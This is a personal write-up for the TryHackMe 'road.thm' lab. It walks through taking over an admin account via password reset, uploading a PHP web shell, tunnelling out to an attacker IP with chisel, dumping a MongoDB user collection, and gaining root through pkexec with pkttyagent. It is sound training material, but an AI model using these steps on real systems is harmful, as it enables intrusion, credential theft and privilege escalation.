🐧
Jackmeister
  • Welcome
  • Misc
    • Resources
    • Cybersecurity Terms You MUST KNOW
  • PG Play
    • Amaterasu
  • Hack The Box
    • Linux
      • Bashed
      • Beep
      • Sau
      • Trick
      • Knife
      • Love
      • Spectra
      • TheNotebook
      • Previse
      • Ophiuchi
      • Shocker
      • Bank
      • Keeper
      • Help
      • Cronos
      • Lame
    • Active Directory
      • Active
      • Forest
      • Timelapse
      • Sauna
    • HTB Register Form
  • TryHackMe
    • Red
    • Year of the Jellyfish
    • S1mple0nly b2r
    • Hermoso
    • This is so easy
    • Altair Network
    • road.thm
  • Platforms
    • Websites and Platforms
  • Tools
    • Hacking Tools
  • B2R template
Powered by GitBook
On this page
  1. TryHackMe

road.thm

Regiter user , reset user password , modify the username to admin@sky.thm upload .php file , locate the file at /v2/profileimages/cmd.php?cmd=whoami

/v2/profileimages can be found at edit profile page source commented

Check for internal opening ports

ss -tuln

dynamic port forwarding

on kali

./chisel server -p 8888 --reverse  
on remote machine 

./chisel client 10.9.62.66:8888 R:socks

checking for internal port

proxychains nmap -sC -sV 127.0.0.1 

proxychains nmap -sn 127.0.0.1/24

found local mondo db

mongo --host localhost --port 27017

show dbs;

use backup;

show collections;
user

db.user.find()

locate suid files :

find / -type f -perm /4000

Exploiting pkexec suid

webdeveloper@sky:~$/usr/bin/pkexec /bin/bash
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/bin/bash' as the super user
Authenticating as: webdeveloper
Password: 
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized

  • Open another terminal to start the required session

echo $$
ssh webdeveloper@road.thm
pkttyagent -p 1561

  • echo $$ in Linux prints the process ID (PID) of the current shell

Breakdown :

  1. The initial SSH session as the webdeveloper account encounters an authentication failure with pkexec, resulting in the "No session for cookie" error.

  2. By opening a new SSH session as the webdeveloper account in a separate terminal window, you establish a fresh authentication session.

  3. In the second terminal, the echo $$ command retrieves the Process ID (PID) of the new SSH session. The PID uniquely identifies this session.

  4. Using the pkttyagent command in the second terminal with the -p option and the PID obtained in the previous step, you associate the new SSH session with the PolicyKit authentication agent.

  5. Going back to the first terminal, the pkexec /bin/bash command is executed again. This time, the new authentication session with the associated agent allows successful authentication using the webdeveloper password provided in the second terminal.

  6. As a result, the pkexec command runs successfully, granting root access to the user in the first terminal, and the root flag can be accessed.

Ymir : in my understanding, because polkit run in graphical. which our machine dont have. so it will need pkttyagent where second machine will act like it.

References : (chisel + tar) https://siunam321.github.io/ctf/tryhackme/Road/

(pkexec) https://theirsecurity.com/thm-writeups/thm-road/

PreviousAltair NetworkNextWebsites and Platforms

Last updated 1 year ago